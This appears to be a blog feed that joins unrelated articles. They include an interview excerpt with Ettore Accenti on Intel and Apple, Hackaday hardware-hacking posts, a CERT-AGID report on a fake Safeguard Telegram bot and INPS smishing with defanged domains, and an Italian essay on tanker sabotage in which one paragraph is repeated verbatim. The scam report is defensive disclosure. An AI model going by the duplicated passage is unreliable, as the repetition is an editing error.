Accenti: Nel 1979 incontrai Mike Markkula, ex Intel e investitore di Apple,allora CEO dell’azienda della “mela morsicata”. Avviammo una partnership per l’Apple II in Italia evitando conflitti con Iret, l’altro distributore italiano. L’Apple II decollò, mentre l’Apple III, causa circuiti difettosi e problemi di surriscaldamento non ebbe il successo meritato. Nel 1983, con Jobs emarginato e le attività sospese, intentammo una causa che si concluse con un accordo vantaggioso. Deluso, riorientai le attività verso nuove collaborazioni, trasformando la sede Apple di Milano in una divisione “Computer Professionali” e, nel 1984, raddoppiammo il fatturato.

Carlo: Qual è stato il giro d’affari di Eledra 3S?

Accenti: Nel 1984 il Gruppo Eledra raggiunse un fatturati di svariati miliardi di lire.

Carlo: Incredibile! Ma tornando a Intel, non abbiamo ancora menzionato i suoi prodotti di punta: i microprocessori.

Accenti: Durante la mia visita nel 1970 allo stabilimento Intel di Mountain View, dopo aver sottoscritto un patto di riservatezza, il Dr. Moore e il Dr. Noyce mi mostrarono un prototipo rivoluzionario: una ROM cancellabile con raggi UV. Il Dr. Dov Frohman, il suo inventore, me ne illustrò il funzionamento.

Carlo: Quindi assistette alla nascita delle EPROM?

Accenti: Sì. Quel prototipo divenne l’EPROM i1702 da 256 bit. All’epoca, Faggin era appena arrivato in Intel dalla Fairchild, e il microprocessore non era ancora stato realizzato. Il mercato restava quello delle memorie.

Carlo: Ma quando nacque il primo microprocessore Intel?

Accenti: Nel 1971, con l’Intel 4004, creato da Faggin, Hoff e Mazor. Inizialmente fu sottovalutato: i volumi di vendita erano irrisori rispetto alle memorie. Addirittura, Intel lo offriva come bonus per incentivare gli ordini di chip! La svolta arrivò nel 1986, quando Andy Grove, presidente di Intel, in vacanza in Austria, decise di abbandonare la produzione di memorie per concentrarsi esclusivamente sulla produzione di microprocessori.
Per gentile concessione dell’ing. Ettore Accenti
Carlo: Quindi fu sufficiente questo passaggio per far diventare Intel un colosso?

Accenti: Non solo. Il Crush Program, ideato dal capo marketing Bill Davidow, fu decisivo. Negli anni ’80, Intel era in crisi: Motorola dominava con il suo 68000 e Zilog, fondata da Faggin dopo aver lasciato Intel, con lo Z80. I clienti preferivano le loro CPU a 16 bit rispetto alle nostre a 8 bit (8008, 8080, 8085). Nove su dieci sceglievano i rivali.

Carlo: E come reagì Intel?

Accenti: Con il Crush Program: un piano segreto per annientare la concorrenza. Mobilitammo tutti, dai distributori come Eledra 3S fino ai vertici, come Grove. Per clienti strategici, quali Olivetti, organizzammo squadre pronte a intervenire in 24 ore. L’obiettivo era presentarci come partner di sistema, non solo fornitori. Rivelammo una roadmap con la serie x86 (286, 386, 486… Pentium), software retro compatibili, ma ancora su carta. Un azzardo geniale: promettemmo compatibilità futura per ridurre i costi di sviluppo.

Carlo: Ma come riuscì Intel a convincere i suoi clienti con prodotti inesistenti?

Accenti: Con la fiducia. Intel aveva già creato board prototipali e sistemi di sviluppo. Svelammo i piani x86 sotto accordi di riservatezza. I tecnici dovettero realizzare ciò che il marketing aveva promesso. E ci riuscirono: in un anno conquistammo 2.000 clienti, il doppio del previsto. Olivetti adottò l’8086, mentre Motorola e Zilog furono colte alla sprovvista. Quella visione trasformò Intel nel gigante di oggi.

Carlo: Passiamo a un altro successo: la nascita di Amstrad Italia. Quali sfide affrontò in quel periodo?

Accenti: Nel 1987, noi distributori navigavamo a vista. L’aumento della concorrenza giapponese e la decisione dei produttori di aprire filiali dirette nei principali Paesi ci resero la vita difficile. In Italia, la svalutazione della lira, il finanziamento del credito clienti e un tasso di cambio del dollaro sfavorevole ci costringevano a grandi sacrifici. Olivetti, nel 1983 manifestò interesse per la mia azienda, quindi valutai una joint venture. L’accordo si concretizzò solo nel luglio 1986, anno di crisi globale: Olivetti, grazie ad un aumento di capitale, entrò in Eledra come partner con il 49%, ma fraintese il nostro modello di business. Eravamo un distributore di servizi, non un trader. I prezzi erano fissati dai contratti con i produttori, e il nostro guadagno derivava da accrediti fissi, non dalla speculazione.

Carlo: Cosa portò al collasso della joint venture?

Accenti: Continuarono i conflitti: mi accusarono di non saper “acquistare”, confondendo i contratti di accredito con la compravendita. Olivetti pretese liquidazioni insensate e bloccò persino un’offerta di salvataggio da un grande distributore internazionale, chiedendomi le dimissioni.

Carlo: Ma come la fenice è rinato dalle ceneri della sua azienda!

Accenti: Rifiutai una proposta tedesca e scelsi Alan Sugar per lanciare Amstrad in Italia. Fu un’avventura intensa di tre anni, seguita da altri tre come vicepresidente di Memorex-Telex.

Carlo: In quanto tempo organizzò Amstrad Italia e quali risultati raggiunse?

Accenti: Dopo aver lasciato Eledra, creai Amstrad Italia da zero in solo tre mesi. In tre anni raggiungemmo un fatturato di centinaia di miliardi di lire, dimostrando che l’innovazione poteva vincere anche in un mercato turbolento.

Carlo: Siamo giunti alla conclusione dell’intervista. La ringrazio per il tempo che ci ha dedicato. Vorrei porle un’ultima domanda: avendo conosciuto, collaborato, e stretto amicizia con figure storiche dell’informatica come Gordon Moore, Robert Noyce, Mike Markkula, Steve Jobs e Steve Wozniak, potrebbe condividere con noi un tratto distintivo della loro personalità?

Accenti: Steve Jobs era un visionario e un genio del marketing, capace di anticipare i desideri delle persone. Tuttavia, poteva risultare divisivo nella leadership e necessitava del supporto tecnico di Steve Wozniak, il vero genio dietro i primi computer Apple. Robert Noyce, invece, era sobrio e accessibile, combinando un rigoroso approccio scientifico con una rara umanità. Mike Markkula riconobbe subito il potenziale dell’Apple II e contribuì significativamente alla crescita di Apple, investendo personalmente e fornendo una guida strategica all’azienda.

Carlo: E per restare in tema, ha conosciuto anche Jack Tramiel, vero?

Accenti: Sì. La mia azienda fu tra i principali distributori del Commodore 64. In quegli anni, fatturammo diversi miliardi di lire grazie a quel modello. Tramiel mi invitò, insieme alla mia famiglia, a Los Angeles per una cena di lavoro, accompagnato dal suo direttore commerciale.

Carlo: Ingegnere, non posso che ringraziarla a nome mio e del pubblico che leggerà questa intervista, tanto piacevole quanto ricca di spunti.

Oggi, l’ingegnere Ettore Accenti, oltre a vantare un glorioso passato, è attivo come consulente per piccole e medie imprese, collabora con diverse Università e scrive articoli e libri, disponibili per l’acquisto sulle principali piattaforme online

L'articolo Dalla Eledra 3S a Intel: l’ingegnere italiano che portò l’Italia nella rivoluzione dei semiconduttori proviene da il blog della sicurezza informatica.

The toaster is a somewhat modest appliance that is often ignored until it stops working. Many cheap examples are not made to be easily repaired, but [Kasey Hou] designed a repairable flat pack toaster.

[Hou] originally planned to design a repairable toaster to help people more easily form an emotional attachment with the device, but found the process of disassembly for existing toasters to be so painful that she wanted to go a step further. By inviting the toaster owner into the process of assembling the appliance, [Hou] reasoned people would be less likely to throw it out as well as more confident to repair it since they’d already seen its inner workings.

Under the time constraints of the project, the final toaster has a simpler mechanism for ejecting toast than most commercial models, but still manages to get the job done. It even passed the UK Portable Appliance Test! I’m not sure if she’d read the IKEA Effect before running this project, but her results with user testing also proved that people were more comfortable working on the toaster after assembling it.

It turns out that Wikipedia couldn’t tell you who invented the toaster for a while, and if you have an expensive toaster, it might still be a pain to repair.

hackaday.com/2025/03/02/flat-p…

Last year, Nintendo has released the Alarmo, a bedside-style alarm clock with a colourful display. Do you own one? You deserve full control over your device, of course. [KernelEquinox] has been reverse-engineering an Alarmo ever since getting one, and there’s no shortage of cool stuff you’ll be able to do with an Alarmo thanks to this work.

Now, just how can you improve upon the Alarmo? Looking through the Alarmo dev community site and threads on the subreddit, there are plenty of ideas, from themes to a ton of possible behaviour tweaks! In particular, Nintendo has already changed Alarmo’s behaviour in a way that is jarring to some users – a third-party development community will help us all make sure our Alarmos work exactly like we expect them to. Want to replace the sound files, tie your Alarmo into your smart home setup, write your apps, tweak the UI or default behaviour, fix a bug that irks you real bad, or access a debug menu? Or, ensure that Alarmo doesn’t contribute to light pollution in your room? All appears to be doable.

Like the Alarmo, but don’t own one yet? They’re limited-release for now, but it will be more widely available this March; we thank [KernelEquinox] for the work in making Alarmo hacker-friendly. If you’ve forgotten, this project started off thanks to the efforts of [Gary] last year. We covered it back then — cat pictures included!

hackaday.com/2025/03/02/making…

It’s been quite a week for asteroid 2024 YR4, which looked like it was going to live up to its “city killer” moniker only to be demoted to a fraction of a percent risk of hitting us when it swings by our neighborhood in 2032. After being discovered at the end of 2024, the 55-meter space rock first popped up on the (figurative) radar a few weeks back as a potential risk to our home planet, with estimates of a direct strike steadily increasing as more data was gathered by professional and amateur astronomers alike. The James Webb Space Telescope even got in on the action, with four precious hours of “director’s discretionary” observation time dedicated to characterizing the size and shape of the asteroid before it gets too far from Earth. The result of all this stargazing is that 2024 YR4 is now at a Level 1 on the Torino Scale of NEO collision risk, with a likely downgrade to 0 by the time the asteroid next swings through again in 2028. So, if like us you were into the whole “Fiery Space Rock 2032” thing, you’ll just have to find something else to look forward to.

On the other hand, if you’re going to go out in a fiery cataclysm, going out as a trillionaire wouldn’t be a bad way to go. One lucky Citibank customer could have done that if only an asteroid had hit during the several hours it took to correct an $81 trillion credit to their account back in April, a mistake that only seems to be coming to light now. You’d think a mistake 80% the size of the global economy would have caused an overflow error somewhere along the way, or that somebody would see all those digits and think something was hinky, but apparently not since it was only the third person assigned to review the transaction that caught it. The transaction, which falls into the “near-miss” category, was reversed before any countries were purchased or fleets of space yachts were commissioned, which seems a pity but also points out the alarming fact that this happens often enough that banks have a “near-miss” category — kind of like a Broken Arrow.

We all know that near-Earth space is getting crowded, with everyone and his brother launching satellite megaconstellations to monetize our collective dopamine addiction. But it looks like things are even starting to get crowded around the Moon, at least judging by this lunar photobomb. The images were captured by the Lunar Reconnaisance Orbiter, which has been orbiting the Moon and studying the landscape for the last 16 years but stretched its capabilities a bit to capture images of the South Korean Danuri. The two probes are in parallel orbits but opposite directions and about 8 kilometers apart at the time, meaning the relative velocity between the two was an unreasonably fast 11,500 km/h. The result is a blurred streak against the lunar surface, which isn’t all that much to look at but is still quite an accomplishment. It’s not the first time these two probes have played peek-a-boo with each other; back in 2023, Danuri took a similar picture when LRO was 18 kilometers below it.

We don’t do much air travel, but here’s a tip: if you want to endear yourself to fellow travelers, it might be best to avoid setting up a phone hotspot named “I Have a Bomb.” That happened last week on American Airlines flight 2863 from Austin, Texas to Charlotte, North Carolina, with predictably results. The prank was noticed while the flight was boarding, causing law enforcement officers to board the plane and ask the prankster to own up to it. Nobody volunteered, so everyone had to deplane and go back through screening, resulting in a four-hour delay and everyone missing their connections. We’re all for fun SSIDs, mind you, but there’s a time and a place for everything.

And finally, we wanted to share this fantastic piece from Brian Potter over at Construction Physics on “Why it’s so hard to build a jet engine.” The answer might seem obvious — because it’s a jet engine, duh — but the article is a fascinating look at the entire history of jet propulsion, from their near-simultaneous invention by the principal belligerents at the end of World War II right through to their modern incarnations. The article is an exploration into the engineering of complex systems, and shows how non-obvious the problems were that needed to be solved to make jet engines practical. It’s also a lesson in the difficulties of turning a military solution into a practical commercial product. Enjoy!

hackaday.com/2025/03/02/hackad…

What is a sensory weaver? [Curiosiate] tells us: “A device which takes sensory data feeds in and converts it in various ways on the body as information streams as though a native sensory input.” As an example, they’ve built one.

This one, called “MK2 Lockpick” is a wrist-mounted array of linear actuators, with a lengthy design/build log to peek into. We don’t get PCB files (blame EasyEDA’s sharing), but we do at least get a schematic and more than enough pictures for anyone interested to reproduce the concept – the levels of bespoke-ness here warrant a new PCB for any newcomers to sensory weaver building, anyway. We also get a story of a proof-of-concept thermal input sensory weaver. The team even includes a lessons learned da, and plenty of inspiration throughout the posts on the blog.

This kind of tech is getting more and more popular, and we are sure there will be more to come — especially as we keep getting cool new gadgets like linear actuators in form of replacement parts. For instance, the actuators in this sensory weaver are harvested from Samsung S23 smartphones, and you could probably find suitable ones as iPhone replacement parts, too. Looking to start out in this area but want a quick build? Look no further than the venerable compass belt.

hackaday.com/2025/03/02/on-sen…

Perfectly clear ice spheres are nifty but can be a bit tricky to make without an apparatus. [Seth Robinson] crafted a copper ice press to make his own.

Copper is well-known for its thermal conductivity, making it a perfect material for building a press to melt ice into a given shape. Like many projects, a combination of techniques yields the best result, and in this case we get to see 3d printing, sand casting, lost PLA casting, lathe turning, milling, and even some good old-fashioned sanding.

The most tedious part of the process appears to be dip coating of ceramic for the lost PLA mold, but the finished result is certainly worth it. That’s not to say that any of the process looks easy if you are a metal working novice. Taking over a week to slowly build up the layers feels a bit excruciating, especially compared to 3D printing the original plastic piece. If you’re ever feeling discouraged watching someone else’s awesome projects, you might want to stick around to the end when [Robinson] shows us his first ever casting. We’d say his skill has improved immensely over time.

If you’re looking for something else to do with casting copper alloys, be sure to checkout this bronze river table or [Robinson’s] copper levitation sphere.

Thanks to [DjBiohazard] for the tip!

youtube.com/embed/vXC_rSEwnGI?…

hackaday.com/2025/03/02/make-i…

Safeguard è un noto servizio, concepito per garantire la sicurezza delle transazioni nel mercato delle criptovalute, accessibile tramite la piattaforma di messaggistica Telegram.

Tuttavia, la sua recente popolarità ha attirato l’attenzione dei criminali informatici, che stanno creando bot fraudolenti su Telegram per ingannare le vittime portando all’installazione di malware o al furto dell’accesso ai loro account.

Una recente analisi ha rivelato l’esistenza di un falso bot di Safeguard che, una volta avviato, richiede all’utente di seguire tre passaggi come ulteriore verifica. L’obiettivo di questa truffa è eseguire codice PowerShell, sfruttando una tecnica già osservata per diffondere il malware Lumma Stealer.

In questi giorni il CERT-AGID ha avuto evidenza di un dominio, di recente registrazione, denominato safeguard-telegram. Questa pagina è collegata a due bot Telegram attualmente attivi, il cui obiettivo è indurre le vittime a scansionare un QR code per abilitare l’accesso da un nuovo dispositivo. In questo modo, la vittima concede ai criminali l’accesso al proprio account.

Il collegamento con lo smishing INPS

Il dominio in questione espone pubblicamente alcune pagine contenenti informazioni sulla configurazione, tra cui il vero indirizzo IP del server che ospita il servizio di truffa.

L’indirizzo IP riportato nel file XML, accessibile tramite browser, risulta, secondo Virustotal, collegato a due domini: inps[.]ec e inps[.]io quest’ultimo già rilevato ed analizzato nel recente comunicato.

La conferma del collegamento arriva visitando direttamente l’indirizzo IP, dove la pagina presenta contenuti e il logo di INPS usati per la truffa.

Un ulteriore dettaglio interessante riguarda i link presenti nel menu superiore, che rimandano tutti a un altro dominio inps[.]st, anche questo risulta essere stato registrato di recente.

Conclusioni

La truffa Safeguard e il collegamento alla truffa INPS mettono in luce come questo gruppo di criminali informatici stia sfruttando contemporaneamente due tipologie distinte di frodi per ottenere accesso alle informazioni delle vittime. Nel primo caso, attraverso bot fraudolenti, cercano di ottenere l’accesso agli account Telegram, mentre nel secondo caso mirano al furto di documenti d’identità tramite campagne di smishing.

Indicatori di Compromissione

Gli IoC relativi a questa campagna sono stati già condivisi con le organizzazioni accreditate al flusso IoC del CERT-AGID.

Link: Download IoC

L'articolo Truffa e smishing che impersona l’INPS: il falso Safeguard ruba dati e installa malware proviene da il blog della sicurezza informatica.

Pour one out for yet another device conquered. This one’s a desk phone for conferences and whatnot, a colour display, a numpad, and a bog standard handset with a speaker and mic. Naturally, also running Linux. You know what to expect – [Parker Reed] has brought Doom to it, and you’d be surprised how playable it looks!

This is the second time a CaptionCall device has graced our pages running Doom — CaptionCall patched out the previous route, but with some firmware dumping and hashcat, root has been acquired once again. [Parker] has upgraded this impromptu gaming setup, too – now, all the buttons are mapped into Doom-compatible keyboard events coming from a single input device, thanks to a C program and an Xorg config snippet. Feel free to yoink for your own Doom adventures or just general CaptionCall hacking!

If you’re interested in the hacking journey, get into the exploitee.rs Discord server and follow the hack timeline from password recovery, start to finish, to Doom, to the state of affairs shown in the video. Now, as the CPU speeds have risen, should the hackerdom switch away from Doom as the go-to? Our community remains divided.

youtube.com/embed/t5-X1oKxfK0?…

hackaday.com/2025/03/02/a-capt…

Nella notte tra il 14 e il 15 febbraio la nave SeaJewel (imo:IMO 9388807) sotto bandiera maltese, ha subito un sabotaggio sotto la linea di galleggiamento mentre era ormeggiata al campo di boe del porto di Vado Ligure (Savona). Il danneggiamento sullo scafo – una falla di oltre un metro e mezzo come riporta la stampa – sembra essere stato provocato da due esplosioni ritardate e separate (20 minuti) tramite esplosivo caricato dall’esterno. Insieme alla Seajewel risultava presente anche la Seacharm (IMO:9773765), sotto bandiera Marshall Islands. La Seacharm proveniva dalla Libia e a sua volta aveva subito un sabotaggio al largo del porto turco di Cheyan tra il 18 e il 19 gennaio.

I due incidenti – in tempi ravvicinati – che sollevano la questione se la società Thenamaris – quale gestore delle due navi e al 2022 collegata agli interessi del CEO Nikolas Martinos – sia stata presa di mira, coinvolgono mezzi che recentemente hanno fatto scalo in Russia, nel terminal di Novorossiysk, continuando a traportare petrolio russo nonostante le sanzioni legate alla guerra in Ucraina. L’UE ha, infatti, chiuso i suoi porti ad oltre 2.800 navi dell’intera flotta mercantile russa e messo al bando ‘il trasporto marittimo di petrolio greggio russo verso paesi terzi’ . Il divieto, tuttavia, non si applica se il petrolio greggio o i prodotti petroliferi sono acquistati a un prezzo pari o inferiore al tetto sui prezzi del petrolio.

La Seajewel ha caricato merci russe almeno tre volte nel 2024 (a febbraio, marzo e maggio) ed è stata avvistata mentre scaricava nel porto di Constanța – parliamo anche di questo dopo – dopo essere arrivata dal porto di Ceyhan. Altre due navi hanno subito sabotaggi in mare. Cosa sta succedendo?
Fonte immagine: Vessel Finder, Seajewel Fonte immagine: Vessel Finder, Sea Charm
Molti di noi sono abituati a vedere il mare, con i suoi bei tramonti, come pura funzione illustrativa, tuttavia il nostro Federico Fellini sapeva bene che il mare non solo può riempire un’intera struttura narrativa, ma che – come riporta Roberto Nepoti in ‘Fellini e il mare’ – sul mare avvengono nefandezze, “il mare (vd. La Nave va) e è il teatro dell’apocalittico finale (otto minuti e mezzo), dove l’attentato di un giovane serbo a un incrociatore austro-ungarico produce in risposta il cannoneggiamento della nave, ponendosi come metafora dello scoppio (siamo nel 1913) della Grande Guerra”.

“It doesn’t matter if a cat is black or yellow, as long as it catches mice”. _ Deng Xiaoping

Il mare come terra, aria, spazio e cyber occupa il suo posto d’onore nella guerra ibrida e coinvolge tutti gli attori in gioco. Ed in questo gioco occupa uno spazio anche la propaganda anche dell’underground. Difficile e complesso comprendere chi ne stia beneficiando, ma ricordiamoci che se i gatti nella prima guerra mondiale hanno aiutato i soldati a tenere le trincee libere dai roditori, la metafora occidentale in Oriente, più precisamente secondo Deng Xiaoping, pioniere della riforma economica in Cina – viene letta tutta in un altro modo: il topo è la prosperità dell’intera società, il gatto – stato confuciano in Oriente – è il modo per ottenerla. Chi è il gatto in Occidente?

IN BREVE:

• Sabotaggi tra petroliere, navi militari e cavi sottomarini
• Telecomunicazioni, cavi sottomarini, spionaggio e pedinamenti
• ‘Waterworld’: le tensioni per il predominio marittimo ed energetico
• “Flotte ombra” e il così detto prezzo massimo di 60 dollari al barile
• Caratteristiche e tendenze specifiche delle navi ombra
• La posizione strategica dell’Italia
• Difficili da arrestare
• I sabotaggi di Seajewel, Seacharm, Grace Ferrum e Suezmax, guerra commerciale o “controlli più rigorosi”?
• La grande vendita di navi greche allo scoppio del conflitto russo-ucraino
• Cui prodest
• Bibliografia

Immagine: NoName e DdoS ai porti italiani, 17 e 20 febbraio 2025 oltre che ai trasporti pubblici.

Sabotaggi tra petroliere, navi militari e cavi sottomarini

La notizia del sabotaggio in mare italiano – avvenuto dopo quelli analoghi della Grace Ferrum (IMO: 9667928) gestita dalla compagnia Cymare, al largo della costa libica all’inizio di febbraio e della Suezmax (IMO: 9234642) nel porto baltico russo di Ust-Luga e quello di dicembre della nave cargo Ursa Major (IMO:9538892) sanzionata (2022 USA e 2023 UK) gestita dalla società russa Oboronlogistika e parte delle operazioni di costruzione militare del Ministero della Difesa russo (affondata nel mediterraneo, ultimo segnale AIS 23 dicembre ore 00:14), o l’incidente subito dalla Koala (IMO:9234642) del 9 febbraio sempre al terminal Ust-Luga – desta non poche preoccupazioni. La Koala gestita dalla cipriota Lagosmarine, mentre il proprietario nominale risulta un cittadino greco ha come vero proprietario il cittadino lettone Alexey Khalyavin, le cui società sono tra le maggiori acquirenti di petrolio russo aggirando il tetto massimo dei prezzi. Ad accusare Lagosmarine – inclusa nell’elenco delle sanzioni americane come parte della flotta ombra russa – di trasportare petrolio iraniano nell’interesse del Corpo delle guardie rivoluzionarie islamiche e del gruppo sciita filo-iraniano Hezbollah, è stato Israele.

Dietro ai sabotaggi si troverebbe un disegno ben organizzato – che ci ricorda la prima guerra mondiale o quella ispano-americana – si relaziona non solo con le navi che hanno fatto scalo recentemente nei porti russi ma che si estende al sabotaggio dei cavi elettrici e sottomarini in un panorama geopolitico sempre più teso, non ultimo quello del Mar Baltico (Estlink 2), che avrebbe coinvolto la petroliera russa Eagle S (IMO:9329760) che le autorità finlandesi hanno descritto come parte della “flotta ombra” di Mosca, quello che ha invece coinvolto la Yi Peng 3 (IMO:9224984) e i cavi sottomarini nel Mar Rosso, tra Gedda, in Arabia Saudita, e Gibuti, nell’Africa orientale.

Ovviamente tutti questi casi non sono una coincidenza anche se bisogna dire che gli incidenti ai cavi sottomarini, potrebbero essere sì intenzionali, ma conseguenza di attrezzature impigliate, cosa meno eccitante ma reale. Infatti per scoraggiare questo comportamento, viene ripagata l’attrezzatura da parte degli operatori per evitare le manomissioni. Caso che non si può applicare invece al sabotaggio del Nord Stream, all’attacco dell’oleodotto Niger Blend – dopo un avvertimento emesso dal Patriotic Liberation Front (FPL) – e il seguente incidente al Balticonnector accidentalmente danneggiato da una nave cinese, ma si sa i cinesi non sono grandi navigatori).

Altro sabotaggio quello relativo invece alla nave militare tedesca Hessen – progettata per contrastare gli attacchi aerei e che ha contribuito a proteggere le navi nel Mar Rosso contro gli Houthi – che ha subito un tentativo di contaminazione del sistema idrico con decine di litri di olio esausto e alla cui indagine partecipa il BAMAD, controspionaggio che conduce anche operazioni ibride, soprattutto nel campo della difesa informatica.

Se poi si aggiunge che dall’inizio di gennaio l’Areonautica italiana – e successivamente dalla Guardia di Finanza e la Marina degli Stati Uniti a metà febbraio – hanno iniziato (vd. Italmilradar) a monitorare il passaggio del sottomarino russo Krasnodar B-265 (accanto al quale ha navigato il rimorchiatore il Churov per dirigersi al largo della costa di Sollum, in Egitto) e l’area della sua navigazione (tra la Sardegna e l’Algeria), la situazione si complica parecchio in materia di sicurezza marittima e diritto internazionale, evidenziando estreme tensioni e sfide strategiche di cui l’Europa, ma soprattutto l’Italia, che bagna con disagio il suo stivale in un’area di primaria importanza per le relazioni esterne in un’invidiabile posizione tra lo stretto della Sicilia e quello di Otranto, che conducono dall’Indo-Pacifico attraverso Suez al cuore iperproduttivo dell’Europa, e le posizioni dei porti di Genova e Trieste di accesso alle spedizioni verso l’area dell’Europa centrale, punti ai quali arrivano le importazioni di materie prime estere e le cui rotte sono garantite dalla ‘supremazia navale’ degli Stati Uniti. La lista non finisce qui.

Anche il cavo sottomarino di Rostelecom sarebbe stato danneggiato, la dichiarazione- che segue alle accuse alla russa Eagle S – è stata fatta l’8 di febbraio e ha fatto risalire l’incidente ad almeno un mese prima.

Ovviamente la per il predominio tra Occidente e Cina minaccia l’equità digitale e la sicurezza dei cavi sottomarini: se l’americana SubCom, la giapponese NEC Corporation e la francese Alcatel Submarine Networks, hanno storicamente dominato la posa dei cavi sottomarini in fibra ottica, ora la Cina è entrata potentemente nel mercato.

Telecomunicazioni, cavi sottomarini, spionaggio e pedinamenti

Una nota: i cavi sottomarini – che si traducono in miliardi di dollari di produttività e informazioni – possono essere altamente vulnerabili a una serie di fattori, non solo ad incidenti fisici. Un’ancora gettate nel posto sbagliato può fare grandi danni, ma si pensa poco ai danni relativi all’hacking e alla raccolta di informazioni di intelligence. In questi cavi – con l’aiuto dei sottomarini – possono essere praticate piccole fessure per inserire dispositivi di ascolto e raccolta dati: attraverso i cavi si possono rintracciare telefonate, e-mail, transazioni finanziarie e la crittografia che li protegge può essere violata. Lo fecero gli USA durante la guerra fredda come parte dell’Operazione Ivy Bells, lo fece l’agenzia inglese GCHQ nel 2013 e nel 2015 furono intercettati dei sottomarini russi vicino ai cavi. Non ultime le accuse del National Computer Virus Emergency Response Center cinese nel report “Lie To Me” che ha per oggetto l’operazione Volt Thypoon e che accusa gli USA di operazioni di monitoraggio dei cavi in ​​fibra ottica sottomarini istituite e gestite dalla NSA (tra cui il progetto UpStream) che convertirebbe e tradurrebbe il traffico di trasmissione nel cavo in fibra ottica sottomarino in informazioni di intelligence leggibili e recuperabili in tempo reale.

Si ricorda inoltre che nel 2020 gli Stati Uniti hanno impedito il progetto di Google e Facebook di un cavo sottomarino che collegasse gli Stati Uniti e Hong Kong.

Oggetto delle più recenti attività marittime è stata la nave di sorveglianza russa Yantar, nave che è stata seguita dalla HMS Somerset della Royal Navy il 22 gennaio 2025 e vicino alla quale e stato ordinato di fare emergere un sottomarino, a causa della posizione strategica in cui navigava, ovvero su infrastrutture sottomarine critiche nella zona economica esclusiva (ZEE) del Regno Unito.

Una nota: i cavi sottomarini – che si traducono in miliardi di dollari di produttività e informazioni – possono essere altamente vulnerabili a una serie di fattori, non solo ad incidenti fisici. Un’ancora gettate nel posto sbagliato può fare grandi danni, ma si pensa poco ai danni relativi all’hacking e alla raccolta di informazioni di intelligence. In questi cavi – con l’aiuto dei sottomarini – possono essere praticate piccole fessure per inserire dispositivi di ascolto e raccolta dati: attraverso i cavi si possono rintracciare telefonate, e-mail, transazioni finanziarie e la crittografia che li protegge può essere violata. Lo fecero gli USA durante la guerra fredda come parte dell’Operazione Ivy Bells, lo fece l’agenzia inglese GCHQ nel 2013 e nel 2015 furono intercettati dei sottomarini russi vicino ai cavi. Non ultime le accuse del National Computer Virus Emergency Response Center cinese nel report “Lie To Me” che ha per oggetto l’operazione Volt Thypoon e che accusa gli USA di operazioni di monitoraggio dei cavi in ​​fibra ottica sottomarini istituite e gestite dalla NSA (tra cui il progetto UpStream) che convertirebbe e tradurrebbe il traffico di trasmissione nel cavo in fibra ottica sottomarino in informazioni di intelligence leggibili e recuperabili in tempo reale.

‘Waterworld’: alcune tensioni per il predominio marittimo ed energetico

E’ necessario prima di tutto chiarire che nei mari globali le tensioni rimangono elevate e coinvolgono diverse nazioni, non ultime in questi giorni la Cina e l’Australia in materia di esercitazioni navali controllate. Ogni anno, i confini marittimi diventano un punto sempre caldo tenendoci con il fiato sospeso nel dubbio che queste tensioni possano alimentare una una crisi marittima più ampia.

Queste dispute sono vissute recentemente anche all’interno dei confini europei:

• tensioni Turchia-Grecia e Cipro, in gran parte pacifiche ma in attesa di risoluzione completa e al 61mo round di colloqui.
• ruoli e interessi dell’UE e degli USA nel Mediterraneo orientale (punto caldo e ponte per il commercio tra Europa e Asia.
• competizione energetica e controversie nel Mediterraneo orientale che coinvolgono: Turchia, Grecia e Cipro, ma coinvolge anche Egitto, Libia, Israele, Italia, Francia e Germania. (Dobbiamo qui ricordare che la Turchia con l’ambizione di Hub energetico per l’Europa ed esclusa dai piani (2021) di Cipro, Egitto, Israele e Grecia di realizzare un gasdotto verso l’Europa, ha sempre più adottato azioni unilaterali, provocando risposte da Grecia e Francia).

A ciò si aggiungono le recenti scoperte di gas naturale al largo della Libia: nel dicembre 2019, la Turchia ha firmato un accordo di delimitazione marittima con il governo libico riconosciuto dall’ONU e ha anche inviato consiglieri militari per aiutare il governo di Tripoli nella sua lotta con gli avversari nella Libia orientale, sostenuta da Egitto ed Emirati Arabi Uniti. Se Israele, Egitto, Grecia e altri membri dell’UE temono che le azioni della Turchia possano minare il gasdotto EastMed (che esporterebbe gas israeliano e cipriota in Grecia e poi in Europa, che ha suscitato anche critiche da parte degli attivisti verdi, come anche Extinction Rebellion che spinge per una più rapida eliminazione dei combustibili fossili), vi è stato anche un rafforzamento della cooperazione (e settore militare) Haftar/Russia, punto di forza per la Russia per gestire la propria presenza in Cirenaica e zona del Sahel. Questo complica l’attuazione del piano Mattei italiano soprattutto la ricerca di alternative dell’Europa al gas russo che incontra gli interessi di Grecia, Cipro, Israele, Egitto e Turchia che invece guarda ad un vecchio piano per trasportare gas del Qatar in Europa attraverso Arabia Saudita, Giordania, Siria e Turchia.

Come si osserva la situazione è molto complessa e vede numerosi attori in gioco statali e non.
Fonte immagine: Depa International Projects
A ció possiamo ancora accostare la cosiddetta rinascita degli Stati Uniti, che dopo avere eroso la sua posizione nel Mediterraneo orientale con la normalizzazione regionale tra Israele e i paesi arabi (2022) e la mediazione dell’accordo di delimitazione marittima tra Israele e Libano, ha aumentato i suoi dispiegamenti come deterrenza, allo scoppio della geurra russa-ucraina (minaccia NATO) e israelo-palestinese (minaccia Iran) e alla ‘crescita’ dell’influenza cinese, obiettivo NATO evidenziato a Madrid.

“Flotte ombra” e il così detto prezzo massimo di 60 dollari al barile

Se ancora non sono chiare le intenzioni del sottomarino russo Krasnodar B-265, tra dimostrazioni o normale operatività nel Mediterraneo e quali siano i porti sicuri che si sia assicurato per rifornirsi, sembrano diventare sempre più evidenti le relazioni tra la navi che hanno subito recenti incidenti o manomissioni, collegate a flotte che hanno il preciso obiettivo di aggirare le sanzioni economiche in corso e operare così in una zona grigia per il trasporto di materie prime energetiche. Tuttavia queste imbarcazioni non trasportano solo petrolio russo, ma in passato sono stati frequenti i casi di coinvolgimento nel trasporto di petrolio venezuelano e iraniano o di trasporto di petrolio verso la Nord Corea, nonostante le sanzioni internazionali. La loro presenza nel Mar Mediterraneo, compresa l’Italia, è stata sempre più notata negli ultimi anni. Il Mediterraneo è infatti zona strategica per il trasporto di petrolio a causa della sua vicinanza alle principali regioni produttrici come Nord Africa e Medio Oriente e alle principali rotte di navigazione che collegano Europa, Asia e Africa. Sebbene l’Italia non rappresenti in sé non sia un importante hub per le loro attività ci sono stati casi di petroliere che hanno attraccato nei suoi porti o operato nelle acque italiane, utilizzando documentazione falsa o dichiarando erroneamente il loro carico per evitare controlli. A queste dovremmo aggiungere le famose navi dei veleni che – dagli anni ‘70 – hanno partecipato alladispersione illegale di rifiuti 